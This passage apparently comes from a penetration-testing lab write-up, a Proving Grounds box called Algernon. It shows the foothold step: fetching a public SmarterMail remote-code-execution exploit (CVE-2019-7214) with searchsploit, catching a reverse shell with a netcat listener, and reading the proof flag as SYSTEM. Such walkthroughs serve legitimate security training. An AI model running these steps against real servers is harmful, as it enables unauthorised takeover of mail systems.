Foothold

$ searchsploit -m 49216         
  Exploit: SmarterMail Build 6985 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49216
     Path: /usr/share/exploitdb/exploits/windows/remote/49216.py
    Codes: CVE-2019-7214
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (4852)
Copied to: /home/adot/oscp/pg/algernon/49216.py

$ nc -lnvp 1337

$ python 49216.py

$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.190.65] 49878

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
bc4101004aa6036e06bb49b2ad4cd04f
PS C:\Windows\system32> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.190.65
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.190.254
PS C:\Windows\system32>

Previous21 NextEnumeration

Last updated 5 months ago